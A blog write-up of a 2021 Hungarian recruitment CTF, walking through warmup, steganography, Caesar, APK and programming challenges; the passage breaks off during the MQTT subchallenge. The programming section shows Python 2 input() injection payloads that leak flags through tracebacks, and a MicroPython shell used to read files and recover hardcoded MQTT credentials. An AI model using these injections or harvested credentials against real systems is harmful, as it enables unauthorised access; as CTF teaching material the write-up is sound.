<!doctype html>
<html>
<head>
	<meta charset="utf-8"/>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>M4t35Z's Blog - basic edition</title>
	<link rel="stylesheet" type="text/css" href="//m4t3sz.gitlab.io/bsc/style.css"/>
</head>

<div id="header">
	<a id="headerLink" href="//m4t3sz.gitlab.io/bsc/">m4t3sz.gitlab.io/bsc</a>
	<span> - </span>
	<span id="headerSubtitle">M4t35Z's Blog - basic edition</span>
</div>
<hr />
<div id="menu">
	<a href="//m4t3sz.gitlab.io/"><b>home</b></a>
	<a href="//twitter.com/szilak44/">twitter</a>
	<a href="//github.com/matesz44/">github</a>
	<a href="//github.com/matesz44/dotfiles/">dotfiles</a>
	<a href="//github.com/matesz44/scripts/">scripts</a>
	<span class="right">
		<a href="//gitlab.com/m4t3sz/sites/">source</a>
	</span>
</div>
<hr />
<div id="content">
<div id="nav">
	<ul>
	<li><a href="/bsc">about</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/showcase/">showcase/</a></li>
	<li><a href="//m4t3sz.gitlab.io/bsc/writeup/"><b>>writeup/</b></a>
		<ul>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/bug/">bug/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/"><b>>ctf/</b></a>
			<ul>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/2020/">2020/</a></li>
			<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/2021/"><b>>2021/</b></a>
				<ul>
				<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/2021/13374C4D3MY/"><b>>13374C4D3MY/</b></a>
					<ul>
					<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/2021/13374C4D3MY/chall/">chall/</a></li>
					<li><a href="//m4t3sz.gitlab.io/bsc/writeup/ctf/2021/13374C4D3MY/img/">img/</a></li>
					</ul>
				</li>
				</ul>
			</li>
			</ul>
		</li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/htb/">htb/</a></li>
		<li><a href="//m4t3sz.gitlab.io/bsc/writeup/thm/">thm/</a></li>
		</ul>
	</li>
	</ul>
</div>
<hr />
<div id="main">

<blockquote><p>2021.01.16 10.00 AM -- 2021.01.17 11.59 PM</p>
</blockquote>
<h1>TOC</h1>
<ol start="0">
<li>Backstory</li>
<li>Warmup</li>
<li>Mobile</li>
<li>Programming</li>
<li>Cryptography</li>
<li>Steganography</li>
<li>Forensics</li>
<li>Misc</li>
<li>Web</li>
<li>Open-Source Intelligence</li>
<li> Exploitation</li>
</ol>
<h1>0. A little backstory :D</h1>
<p>We finished 3rd in ctftime in the Hungarian leaderboard and after taking a look at other teams we realized we were relatively small in members compared to them.</p>
<p>So we made the decision. We need more teammates but not too many because we still want to learn from ctf's and each other instead of one pro guy speed running every ctf we take part in.</p>
<p>We need to make sure the people we invite to our group are not fully beginners and they have eager to learn and that's the reason why we organized a ctf competition.</p>
<blockquote><p><strong><em>The First 3 can join our team 1337B01S</em></strong></p>
</blockquote>
<p>Since the competition ended by now, here's the <strong>TOP 10</strong>:</p>
<pre><code> 1  | fpatrik
 2  | SBlake
 3  | K4pjL
 4  | Fuszi
 5  | Kamee Kaze
 6  | TheF00L
 7  | djohni
 8  | poli &amp; Vinyő
 9  | qmp
10  | wqer &amp; Utaair
</code></pre>
<p><strong><em>Congratulations!!!</em></strong></p>
<p>And thanks for playing :D</p>
<h1>1. Warmup challenges</h1>
<blockquote><p><em>These challenges are the easiest ones</em></p>
</blockquote>
<p><strong><em>Let's DO SOME CHALLENGES BOIIIIISSS</em></strong>!</p>
<h2>Read the rules - 10 - By ~T4r0</h2>
<p>As it says read the rules please and take a closer look at the source because there was a hidden flag there ;)</p>
<ol>
<li>Go to the main page of the ctf <a href="https://ctf.t4ks3c.xyz/">ctf.t4ks3c.xyz/</a></li>
<li>Hit <code>ctrl-u</code> or <code>F12</code> to view the source.</li>
<li>Search for <code>flag</code>. If you used <code>ctrl-u</code> just hit <code>ctrl-f</code> and type flag. There were 5 on this page. The last was the actual flag <strong>hidden in a comment</strong>.</li>
</ol>
<p><img src="img/read_the_rules1.png" alt="flag" /></p>
<p><strong><em>Takeaway</em></strong>: Always take a look at the source!</p>
<p>If you've chosen the F12(developer tools) way you must've clicked inspector(firefox) or elements(chromium) and searched the DOM there.</p>
<p><img src="img/read_the_rules2.png" alt="flag" /></p>
<p>The most simple way was to use curl here and grep for the flag.</p>
<pre><code>$ curl https://ctf.t4ks3c.xyz/ | grep -o 'flag{.*}'
flag{valami}
flag{4_l1ttl3_w4rmup_f0r_th3_3z_p01nt5}
</code></pre>
<p>And we got the flag again!</p>
<pre><code>flag{4_l1ttl3_w4rmup_f0r_th3_3z_p01nt5}
</code></pre>
<h2>Stego basics - 50 - By ~T4r0</h2>
<p>File: <a href="chall/smoke.png">smoke.png</a></p>
<ul>
<li>It's something about steganography</li>
</ul>
<p>Steganography means something was hidden in the image and we have to extract it somehow.</p>
<p>It's always good to check the metadata(<strong>exif data</strong>) of the files because in some cases they might contain sensitive information.</p>
<p><em>Just check the docx file your teacher sent</em> on teams or whatever you are using for online classes. It usually contains the name of the creator etc...</p>
<p>So we need a tool to get this juicy metadata out.
After a google search, we know the name of the tool we need to extract exif information is <code>exiftool</code>.</p>
<ul>
<li>Install it</li>
</ul>
<p>And now we can run it on the picture:</p>
<pre><code>$ exiftool smoke.png

ExifTool Version Number         : 12.13
File Name                       : smoke.png
Directory                       : .
File Size                       : 42 KiB
File Modification Date/Time     : 2021:01:08 10:30:16+01:00
File Access Date/Time           : 2021:01:11 08:39:46+01:00
File Inode Change Date/Time     : 2021:01:08 10:30:19+01:00
File Permissions                : rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 910
Image Height                    : 615
Bit Depth                       : 4
Color Type                      : Palette
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Palette                         : (Binary data 33 bytes, use -b option to extract)
Comment                         : flag{3x1f_d4t4_c4n_h1d3_1mp0rt4nt_th1ng5}
Image Size                      : 910x615
Megapixels                      : 0.560
</code></pre>
<p>Did you notice the comment field?</p>
<pre><code>flag{3x1f_d4t4_c4n_h1d3_1mp0rt4nt_th1ng5}
</code></pre>
<h2>Julius - 50 - By ~T4r0</h2>
<blockquote><p>bhwc{Y345U4N<em>S0Q1Z</em>X<em></em>N0QZ}</p>
</blockquote>
<ul>
<li>It looks like some type of encoding</li>
<li>Note that the flag format is correct (<code>4 letters + { + some_text + }</code>)</li>
<li>We have to decrypt it!</li>
</ul>
<p>Since it says Julius you can search for his name and encoding. It will throw out Caesar cipher. Click on the first link: <a href="https://cryptii.com/pipes/caesar-cipher">cryptii.com/pipes/caesar-cipher</a> and paste the encoded flag.
It gives <code>iodj{F345B4U_Z0X1G_E_SU0XG}</code> it's still not the flag.</p>
<p>But no problem because we can increase the shift by clicking on the <strong>+</strong> (the default is 7). After some clicking, we found the correct flag with <code>30 shifts</code>!</p>
<pre><code>flag{C345Y4R_W0U1D_B_PR0UD}
</code></pre>
<p><img src="img/julius.png" alt="julius" /></p>
<ul>
<li><strong>NOTE</strong>: I used a little JS to get inverted colors in chromium (You can save it as a bookmark like I did and just click it when your eyes hurt because so some light themed websites in the middle of the night ;)):</li>
</ul>
<pre><code>javascript:(function(){ var h=document.getElementsByTagName('head')[0],s=document.createElement('style');s.setAttribute('type','text/css'); s.appendChild(document.createTextNode('html{-webkit-filter:invert(100%) hue-rotate(180deg) contrast(70%) !important; background: #fff;} .line-content {background-color: #fefefe;}'));h.appendChild(s); })()
</code></pre>
<p>Another way to solve the challenge is to use <code>tr</code> and some logic :D</p>
<ul>
<li>Encryption mechanism: <strong>f turns to b</strong>; <strong>l turns to h</strong>; <strong>a turns to w</strong> ...</li>
<li>Decryption mechanism: <strong>b turns to f</strong>; <strong>h turns to l</strong>; <strong>w turns to a</strong> ...</li>
<li>English Alphabet: <code>ABCDEFGHIJKLMNOPQRSTUVWXYZ</code></li>
<li>Differences: bcdef; hijkl, wxyza --&gt; 5 letter difference</li>
</ul>
<p>I used <code>tr</code> in order to rotate the text by 5 letters:</p>
<pre><code>$ echo 'bhwc{Y345U4N_S0Q1Z_X_LN0QZ}' | tr 'A-Za-z' 'E-ZA-De-za-d'
flag{C345Y4R_W0U1D_B_PR0UD}
</code></pre>
<pre><code>flag{C345Y4R_W0U1D_B_PR0UD}
</code></pre>
<ul>
<li>I hope you learned something new from this basic <em>ROT</em> challenge :D</li>
</ul>
<h2>JPEG - 50 - By ~T4r0</h2>
<blockquote><p>The flag is on this jpg.</p>
</blockquote>
<p>File: <a href="chall/jpeg_image.jpg">jpeg_image.jpg</a></p>
<p>I tried to open it with my image viewer but i got an error:</p>
<pre><code>$ sxiv jpeg_image.jpg
sxiv: jpeg_image.jpg: Error opening image
sxiv: no more files to display, aborting
</code></pre>
<p>Then I ran file on it:</p>
<pre><code>$ file jpeg_image.jpg
jpeg_image.jpg: JPEG image data
</code></pre>
<ul>
<li>JPEG image data</li>
<li>That's <strong>NOT</strong> what a normal JPEG looks like!</li>
</ul>
<p><code>file</code> on a normal jpeg:</p>
<pre><code>$ file avatar.jpg
/home/matesz/dox/pix/avatar.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment
length 16, progressive, precision 8, 254x254, components 3
</code></pre>
<ul>
<li>That's what a normal JPEG looks like! :D</li>
</ul>
<p>Let's take a look at it's <a href="https://en.wikipedia.org/wiki/List_of_file_signatures">magic bytes</a>:</p>
<pre><code>$ xxd jpeg_image.jpg | head -n 3
00000000: ffd8 ffdb 0d0a 1a0a 0000 000d 4948 4452  ............IHDR
00000010: 0000 0258 0000 00c8 0806 0000 0034 9f9f  ...X.........4..
00000020: b600 0001 8369 4343 5049 4343 2070 726f  .....iCCPICC pro
</code></pre>
<p>If you take a look at the jpeg and png you recognize that the <strong><em>beginning of this file is JPEG</em></strong> but the <strong><em>rest of it is PNG</em></strong>.</p>
<pre><code>JPEG: FF D8 FF DB
PNG: 89 50 4E 47 0D 0A 1A 0A

ffd8 ffdb 0d0a 1a0a
^^^^ ^^^^ ^^^^ ^^^^
 \    /    \    /
  \  /      \  /
 JPEG       PNG
</code></pre>
<p>We have to change it <strong>to PNG</strong>(<code>89 50 4E 47 0D 0A 1A 0A</code>) somehow and that's the time when <code>hexeditor</code> is very handy.</p>
<p>Hexeditor basics: Just like nano, open the file and write it. Then save it with <code>ctrl-x</code> and hit <code>&lt;Return&gt;</code>.
Btw if you need more in-depth knowledge about the tool RTFM:</p>
<pre><code>man hexeditor
</code></pre>
<pre><code>$ hexeditor jpeg_image.jpg
89 50 4E 47
&lt;ctrl-x&gt;&lt;Return&gt;
</code></pre>
<p>Now try again with an image viewer:</p>
<pre><code>flag{1m4g3s_c4n_b3_tr1cky}
</code></pre>
<h2>Data Number Structure - 50 - By ~T4r0</h2>
<blockquote><p>In Minecraft there's an important rule: Never .... straight down!</p>
</blockquote>
<p>Hints:</p>
<blockquote><p>The name is a hint</p>
</blockquote>
<blockquote><p>The minecraft thing is just a hint, not the challenge itself. Think about unix programs.</p>
</blockquote>
<ul>
<li>The answer is <strong><em>DIG</em></strong>.</li>
<li>This is a cli tool for DNS reconnaissance</li>
<li><em>Data Number Structure -- DNS =&gt; We are on the good track</em></li>
</ul>
<p>Let's use <code>dig</code>!</p>
<p>There is an option in dig to get the <strong>TXT Records</strong> which is <code>dig txt &lt;domain&gt;</code>.</p>
<pre><code>$ dig txt t4ks3c.xyz

; &lt;&lt;&gt;&gt; DiG 9.16.8-Debian &lt;&lt;&gt;&gt; txt t4ks3c.xyz
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 61413
;; flags: qr rd ra; QUERY: 1, ANSWER: 7, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;t4ks3c.xyz.			IN	TXT

;; ANSWER SECTION:
t4ks3c.xyz.		793	IN	TXT	&quot;cia 123.97.115.99&quot;
t4ks3c.xyz.		793	IN	TXT	&quot;v=spf1 a mx ~all&quot;
t4ks3c.xyz.		793	IN	TXT	&quot;ZmxhZ3sxVFNfNExMVzRZU19ETlN9Cg==&quot;
t4ks3c.xyz.		793	IN	TXT	&quot;fszb 125.255.255.255&quot;
t4ks3c.xyz.		793	IN	TXT	&quot;fbi 49.49.95.114&quot;
t4ks3c.xyz.		793	IN	TXT	&quot;mosad 117.108.51.122&quot;
t4ks3c.xyz.		793	IN	TXT	&quot;nki 102.108.97.103&quot;

;; Query time: 11 msec
;; SERVER: 192.168.0.1#53(192.168.0.1)
;; WHEN: Sun Jan 17 10:03:54 CET 2021
;; MSG SIZE  rcvd: 269
</code></pre>
<ul>
<li>There are some IP addresses and a weird looking base64 encoded string</li>
</ul>
<p>There is a tool on gnu/linux systems that let you {en,de}code base64 and the name of it is obviously <code>base64</code>.</p>
<p>You can take a look at the manpage:</p>
<pre><code>man base64
</code></pre>
<p>So we have to use <code>-d</code> switch for decoding.</p>
<pre><code>$ echo 'ZmxhZ3sxVFNfNExMVzRZU19ETlN9Cg==' | base64 -d
flag{1TS_4LLW4YS_DNS}
</code></pre>
<h2>0uch - 50 - By ~\M4t35Z</h2>
<blockquote><p>I hid a flag in this meme somewhere. Can you find it?</p>
</blockquote>
<p>File: <a href="chall/challenge.gif">challenge.gif</a></p>
<p>Just download the file and open it. It's only a meme.</p>
<p>But we MUST find a flag in there somewhere! Let's take a look at the exif data with the previously used tool <code>exiftool</code>.</p>
<pre><code>$ exiftool challenge.gif
ExifTool Version Number         : 12.13
File Name                       : challenge.gif
Directory                       : .
File Size                       : 3.2 MiB
File Modification Date/Time     : 2021:01:17 10:10:26+01:00
File Access Date/Time           : 2021:01:17 10:10:26+01:00
File Inode Change Date/Time     : 2021:01:17 10:10:49+01:00
File Permissions                : rw-r--r--
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 562
Image Height                    : 460
Has Color Map                   : Yes
Color Resolution Depth          : 7
Bits Per Pixel                  : 8
Background Color                : 0
Animation Iterations            : Infinite
Comment                         : 1by1
Frame Count                     : 84
Duration                        : 4.20 s
Image Size                      : 562x460
Megapixels                      : 0.259
</code></pre>
<p>There is a hint in the <strong>Comment</strong> field:</p>
<pre><code>Comment : 1by1
</code></pre>
<blockquote><p>One by One</p>
</blockquote>
<ul>
<li>This is a hint to open the picture in gimp or another image viewer/editor which can go through the multiple images in a gif one by one.</li>
</ul>
<p>I used <code>sxiv</code> here because it's just awesome :D</p>
<p>sxiv basic controls in a gif: <code>ctrl-space</code> - pause/resume gif, <code>ctrl-n</code> - next image of gif, <code>ctrl-p</code> - previous image of gif</p>
<p>Btw RTFM again: <code>man sxiv</code></p>
<pre><code>$ sxiv challenge.gif
</code></pre>
<p>On the 58th image we can find a weird text going through the cat:</p>
<p><img src="img/0uch_text.png" alt="0uch_text" /></p>
<p>If you take a closer look at this you can read the flag:</p>
<pre><code>flag{17_hur75_50_b4d}
</code></pre>
<h1>2. Mobile challenge - 100 - By ~WoLfY</h1>
<blockquote><p>I make mobile apps too! They don't really have a purpose but I gotta start somewhere right?</p>
</blockquote>
<p>File: <a href="chall/L33T_4PP.apk">L33T_4PP.apk</a></p>
<p>Since this is a mobile challenge and this is an apk it's best to use <code>apktool</code> here in order to <strong>unpack</strong> the .apk file to .smali/.xml, etc... files.</p>
<pre><code>$ apktool d L33T_4PP.apk
</code></pre>
<p>We have a directory called <code>L33T_4PP</code> after some searching you can find the flag in <code>L33T_4PP/res/layout/main.xml</code>. (line 4).</p>
<pre><code>&lt;TextView android:textSize=&quot;12.0sp&quot; android:textColor=&quot;#ff11002b&quot; android:id=&quot;@id/textview1&quot; android:background=&quot;#ff11002b&quot; android:padding=&quot;8.0dip&quot; android:layout_width=&quot;fill_parent&quot; android:layout_height=&quot;30.0dip&quot; android:text=&quot;flag{@PK_FL@G_15_H3R3}&quot; /&gt;
</code></pre>
<p>Btw you could use grep too for faster completion:</p>
<pre><code>$ grep -rno 'flag{.*}' ./L33T_4PP
./L33T_4PP/res/layout/main.xml:4:flag{@PK_FL@G_15_H3R3}
</code></pre>
<pre><code>flag{@PK_FL@G_15_H3R3}
</code></pre>
<ul>
<li><code>-r</code> =&gt; recursive</li>
<li><code>-n</code> =&gt; show line number</li>
<li><code>-o</code> =&gt; only matching</li>
<li><code>.*</code> =&gt; anything</li>
</ul>
<h1>3. Programming challenges</h1>
<h2>Whyton - By ~\M4t35Z</h2>
<ul>
<li>These challenges are basically the same</li>
<li>They all based on a python2 vulnerability in the <code>input()</code> function</li>
</ul>
<p>There are 2 blogposts about this:
<ul>
<li><a href="https://posts.xh4h.com/python/2019/08/02/input_poc.html">posts.xh4h.com/python/2019/08/02/input_poc.html</a></li>
<li><a href="https://posts.xh4h.com/python/2019/08/03/input_magic.html">posts.xh4h.com/python/2019/08/03/input_magic.html</a></li>
</ul>
</p>
<p>I agree, I copied this challenge but this was so mindblowing when I read that so everybody should know about it! :D</p>
<h3>Whyton 1 - 100</h3>
<blockquote><p>Guess the number! Or do it the other way! :D</p>
</blockquote>
<blockquote><p><strong>nc 192.46.235.191 2220</strong></p>
</blockquote>
<p>File: <a href="chall/hax1.py">hax1.py</a></p>
<p>Source code:</p>
<pre><code class="language-py">import random
flag = &quot;REDACTED&quot;
rand_num = random.randrange(200)

try:
    p = input(&quot;Guess the secret number(0-200): &quot;)
    if p == rand_num:
        print(&quot;Noice!&quot;)
        print(&quot;Here is ur flag bro: &quot; + flag) 
    else:
        print(&quot;Wrong! TRY H4RD3R! :(&quot;)

except Exception as e:
    print(&quot;What are u doin? xD&quot;)
</code></pre>
<ul>
<li>A simple python script</li>
<li>Generates a random number </li>
<li>If the user guessed it rght it prints out the value of <code>flag</code></li>
</ul>
<p>Try to get the dummy flag locally:</p>
<pre><code>python2 hax1.py
Guess the secret number(0-200): asd
What are u doin? xD

python2 hax1.py
Guess the secret number(0-200): 12
Wrong! TRY H4RD3R! :(

python2 hax1.py
Guess the secret number(0-200): rand_num
Noice!
Here is ur flag bro: REDACTED

python3 hax1.py
Guess the secret number(0-200): rand_num
Wrong! TRY H4RD3R! :(
</code></pre>
<ul>
<li>We got it with python2 but not with python3!</li>
</ul>
<p>Now it's time to use this on the server.</p>
<pre><code>$ nc 192.46.235.191 2220
Guess the secret number(0-200):
rand_num
Noice!
Here is ur flag bro: flag{4yy_4_py2_1337_h3R3}
</code></pre>
<pre><code>flag{4yy_4_py2_1337_h3R3}
</code></pre>
<h3>whyton 2 - 150</h3>
<blockquote><p>Guess the loooooong ass password but u also have the other option!</p>
</blockquote>
<blockquote><p><strong>nc 192.46.235.191 2221</strong></p>
</blockquote>
<p>File: <a href="chall/hax2.py">hax2.py</a></p>
<p>Source:</p>
<pre><code class="language-py">import string, random

flag = &quot;REDACTED&quot;
password = ''.join(random.choice(string.ascii_lowercase) for i in range(69))

try:
    if input(&quot;Password &gt; &quot;) == password:
        print(&quot;Awesome!&quot;)
        print(&quot;But TRY H4RD3R if u want tha fl4G!&quot;)
    else:
        print(&quot;Wrong!&quot;)
        print(&quot;The password was: &quot; + password)
except NameError as e:
    print(&quot;What are u doing? xD&quot;)
</code></pre>
<p>The same vuln but there is no <code>print(flag)</code> so we have to get it somehow.</p>
<p>Try to give it the correct password with this vulnerability:</p>
<pre><code>$ python2 hax2.py
Password &gt; password
Awesome!
But TRY H4RD3R if u want tha fl4G!
</code></pre>
<ul>
<li>Yes, but actually no</li>
<li>There should be a way to print out the flag</li>
</ul>
<p>And here comes the verbosive error very handy in python :D</p>
<ul>
<li>If I can break it somehow I will be able to get the flag</li>
</ul>
<p>With the vulnerability, we can run python2 code so we can make use of casting in order to get an error that prints out the flag</p>
<ul>
<li>We can try casting the string flag to int which will usually return an error.</li>
</ul>
<pre><code>$ python2 hax2.py
Password &gt; int(flag)
Traceback (most recent call last):
  File &quot;hax2.py&quot;, line 7, in &lt;module&gt;
    if input(&quot;Password &gt; &quot;) == password:
  File &quot;&lt;string&gt;&quot;, line 1, in &lt;module&gt;
ValueError: invalid literal for int() with base 10: 'REDACTED'
</code></pre>
<ul>
<li>Got the dummy flag locally</li>
</ul>
<p>It's time to get it from the server:</p>
<pre><code>$ nc 192.46.235.191 2221
Password &gt;
int(flag)
Traceback (most recent call last):
  File &quot;/home/hax2/hax2&quot;, line 11, in &lt;module&gt;
    if input() == password:
  File &quot;&lt;string&gt;&quot;, line 1, in &lt;module&gt;
ValueError: invalid literal for int() with base 10: 'flag{U_4r3_4_Py7H0n2_31337__BTW_d0n7_u53_17}'
</code></pre>
<pre><code>flag{U_4r3_4_Py7H0n2_31337__BTW_d0n7_u53_17}
</code></pre>
<h3>Whyton 3 - 200</h3>
<blockquote><p>Because of the nature of the challenge, the flag contains only numbers! After you get the flag, you need to wrap it with flag{} to be correct, and send it in like that.</p>
</blockquote>
<blockquote><p><strong>nc 192.46.235.191 2222</strong></p>
</blockquote>
<p>File: <a href="chall/hax3.py">hax3.py</a></p>
<p>Source:</p>
<pre><code class="language-py">import string, random

flag = &quot;REDACTED&quot;
password = ''.join(random.choice(string.ascii_lowercase) for i in range(69))

try:
    if input(&quot;Password &gt; &quot;) == password:
        print(&quot;Awesome!&quot;)
    else:
        print(&quot;Wrong!&quot;)
        print(&quot;The password was: &quot; + password)
except NameError as e:
    print(&quot;What are u doing? xD&quot;)
</code></pre>
<ul>
<li>It isn't printing the flag on success</li>
<li>The flag contains only numbers so int(flag) won't return any error</li>
</ul>
<p>But after some thinking, you might realize that you can add a string to the number while casting which will surely return an error again.</p>
<pre><code>int(flag + &quot;asd&quot;)
</code></pre>
<p>I firstly modified the source's flag line to:</p>
<pre><code>flag = 1234
</code></pre>
<pre><code>$ python2 hax3.py
Password &gt; int(flag)
Wrong!
The password was: uuxnncyxaazfseuurgubdtsakjoyuirszajsuekjlrianmdyrvbrbxediqcvbzqleencv
</code></pre>
<ul>
<li>Okay we can't do the thing we did before.</li>
</ul>
<p>But try the one where we add a string to the flag:</p>
<pre><code>$ nc 192.46.235.191 2222
Password &gt;
int(flag+&quot;asd&quot;)
Traceback (most recent call last):
  File &quot;/home/hax3/hax3&quot;, line 11, in &lt;module&gt;
    if input() == password:
  File &quot;&lt;string&gt;&quot;, line 1, in &lt;module&gt;
ValueError: invalid literal for int() with base 10: '133769420694201337asd'
</code></pre>
<pre><code>133769420694201337asd
flag{133769420694201337}
</code></pre>
<h2>&lt;p style="font-size:5px"&gt;Snake&lt;/p&gt; - 250 - By ~takov751</h2>
<blockquote><p>Look at my snake.</p>
</blockquote>
<p><img src="chall/snake_doggo.png" alt="snake_doggo" /></p>
<blockquote><p><strong>nc 192.46.235.191 2333</strong></p>
</blockquote>
<pre><code>$ nc 192.46.235.191 2333
MicroPython v1.13-268-gf7aafc062-dirty on 2020-12-28; linux version
Use Ctrl-D to exit, Ctrl-E for paste mode
&gt;&gt;&gt;
</code></pre>
<ul>
<li>MicroPython</li>
<li>This was <strong><em>my favourite challenge</em></strong> btw :D</li>
<li>We just have to mess with it</li>
</ul>
<pre><code>help('modules')
__main__          termios           uio               usocket
_thread           uarray            ujson             ussl
btree             ubinascii         umachine          ustruct
builtins          ucollections      uos               usys
cmath             ucryptolib        upip              utime
ffi               uctypes           upip_utarfile     utimeq
gc                uerrno            urandom           uwebsocket
math              uhashlib          ure               uzlib
micropython       uheapq            uselect
Plus any modules on the filesystem
</code></pre>
<ul>
<li>There is an interesting one: <code>uos</code>. This is the <code>os</code> lib in MicroPython</li>
</ul>
<p>Now, we have to look up the docs to be able to go further.</p>
<ul>
<li><a href="http://docs.micropython.org/en/latest/library/uos.html">docs.micropython.org/en/latest/library/uos.html</a></li>
</ul>
<p>Let's try the functions!</p>
<pre><code>import uos

uos.uname()
Traceback (most recent call last):
  File &quot;&lt;stdin&gt;&quot;, line 1, in &lt;module&gt;
AttributeError: 'module' object has no attribute 'uname'
</code></pre>
<ul>
<li>This means some of the functions are not available!</li>
</ul>
<p>Try Harder!</p>
<pre><code>&gt;&gt;&gt; for i in uos.ilistdir(&quot;/&quot;):
for i in uos.ilistdir(&quot;/&quot;):
...     print(i)

('run', 16384, 3731629)
('srv', 16384, 2184439)
('mnt', 16384, 2184354)
('.', 16384, 2433783)
('lib', 16384, 3731600)
('home', 16384, 2184133)
('opt', 16384, 2184355)
('..', 16384, 2433480)
('tmp', 16384, 3731632)
('var', 16384, 3843692)
('etc', 16384, 2433527)
('proc', 16384, 2184356)
('sbin', 16384, 3844284)
('sys', 16384, 2184440)
('media', 16384, 2184353)
('dev', 16384, 2433601)
('bin', 16384, 3844208)
('root', 16384, 2184357)
('boot', 16384, 2183958)
('usr', 16384, 3844350)
('lib64', 16384, 2184351)
('test', 16384, 2433866)
('logs', 16384, 2433867)
('.dockerenv', 32768, 2433486)
('start.sh', 32768, 2433860)
('asd.sh', 32768, 2433859)
('data', 16384, 3843750)
('flag9ab17b822020c7cce76295ffb78cb7e15358074e5b7e5fe58db2a22644b27098', 32768, 3729880)
</code></pre>
<ul>
<li>There are some interesting files/dirs in root</li>
<li>/test</li>
<li>/.dockerenv</li>
<li>/start.sh</li>
<li>/asd.sh</li>
<li>/data</li>
<li>/flag9ab17b822020c7cce76295ffb78cb7e15358074e5b7e5fe58db2a22644b27098</li>
</ul>
<p>Now, we have some files/dirs we just have to read/list them.</p>
<p>Reading the flag:</p>
<pre><code>open(&quot;flag9ab17b822020c7cce76295ffb78cb7e15358074e5b7e5fe58db2a22644b27098&quot;).read()
'flag{my_pyth0n_1s_k1nd4_m1cr0}'
</code></pre>
<pre><code>flag{my_pyth0n_1s_k1nd4_m1cr0}
</code></pre>
<h2>This sucks - 200</h2>
<blockquote><p>Subchallange: Snake There is another project I am working on somewhere on the system. You may find something in the haystack.</p>
</blockquote>
<ul>
<li>This is a subchallenge of the previous one</li>
</ul>
<p>It's time to list the other interesting directories/read the files.</p>
<pre><code>for i in uos.ilistdir(&quot;/test&quot;):
...     print(i)

('.', 16384, 262936)
('..', 16384, 262700)
('sub.py', 32768, 256201)
</code></pre>
<ul>
<li>There is a file <code>sub.py</code>!</li>
</ul>
<p>Read it:</p>
<pre><code>open(&quot;/test/sub.py&quot;).read()
'import time\nfrom umqtt.simple import MQTTClient\nimport random\n\n# sub test know i can see all of my topics\n\n# Received messages from subscriptions will be delivered to this callback\ndef sub_cb(topic, msg):\n    print((topic, msg))\n\ndef do_sub(topic=&quot;&quot;, server=&quot;192.46.235.191&quot;, user=&quot;sensors&quot;, password=&quot;hunter2&quot;,port=25200):\n    c = MQTTClient(str(random.randint(1,1000000)), server,user=user,password=password,port=port)\n    c.set_callback(sub_cb)\n    c.connect()\n
   topic = topic.encode()\n    try:\n        c.subscribe(topic)\n        while True:\n
  if True:\n                # Blocking wait for message\n                c.wait_msg()\n
   else:\n                # Non-blocking wait for message\n                c.check_msg()\n
          # Then need to sleep to avoid 100% CPU usage (in a real\n                # app other useful actions would be performed instead)\n                time.sleep(1)\n    except:\n        print(&quot;give at least one topic&quot;)\n    \n\n    c.disconnect()'
</code></pre>
<ul>
<li>It's a mess but we can fix it with vim!</li>
<li><p>Select the whole text in visual mode then hit:</p>
<p>  <strong>:s/\\n/&lt;CTRL-v&gt;&lt;Return&gt;/g</strong></p>
</li>
</ul>
<p>this will turn to:</p>
<pre><code>:'&lt;,'&gt;s/\\n/^M/g
</code></pre>
<p>And hit enter!</p>
<pre><code class="language-py">'import time
from umqtt.simple import MQTTClient
import random

# sub test know i can see all of my topics

# Received messages from subscriptions will be delivered to this callback
def sub_cb(topic, msg):
    print((topic, msg))

def do_sub(topic=&quot;&quot;, server=&quot;192.46.235.191&quot;, user=&quot;sensors&quot;, password=&quot;hunter2&quot;,port=25200):
    c = MQTTClient(str(random.randint(1,1000000)), server,user=user,password=password,port=port)
    c.set_callback(sub_cb)
    c.connect()

   topic = topic.encode()
    try:
        c.subscribe(topic)
        while True:

  if True:
                # Blocking wait for message
                c.wait_msg()

   else:
                # Non-blocking wait for message
                c.check_msg()

          # Then need to sleep to avoid 100% CPU usage (in a real
                # app other useful actions would be performed instead)
                time.sleep(1)
    except:
        print(&quot;give at least one topic&quot;)
    

    c.disconnect()'
</code></pre>
<ul>
<li>It's much nicer now :D</li>
</ul>
<p>Intersting lines:</p>
<pre><code>from umqtt.simple import MQTTClient
def do_sub(topic=&quot;&quot;, server=&quot;192.46.235.191&quot;, user=&quot;sensors&quot;, password=&quot;hunter2&quot;,port=25200):
</code></pre>
<ul>
<li>MQTT</li>
<li>192.46.235.191</li>
<li>sensors</li>
<li>hunter2</li>
<li>25200</li>
</ul>
<p>I searched for some mqtt cli client:</p>
<ul>
<li><a href="https://github.com/hivemq/mqtt-cli">github.com/hivemq/mqtt-cli</a></li>
<li><a href="https://hivemq.github.io/mqtt-cli/docs/installation/packages.html">hivemq.github.io/mqtt-cli/docs/installation/packages.html</a></li>
<li>I downloaded the deb</li>
</ul>
<pre><code>$ wget https://github.com/hivemq/mqtt-cli/releases/download/v4.4.0/mqtt-cli-4.4.0.deb
</code></pre>
<ul>
<li>I read the docs</li>
</ul>
<p><a href="https://hivemq.github.io/mqtt-cli/docs/subscribe.html">hivemq.github.io/mqtt-cli/docs/subscribe.html</a></p>
<p>And I gave it some parameters(<code>#</code> means subscribe to <strong>every</strong> channel):</p>
<pre><code>$ mqtt sub -t &quot;#&quot; -h 192.46.235.191 -u sensors -pw hunter2 -p 25200

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=lcd
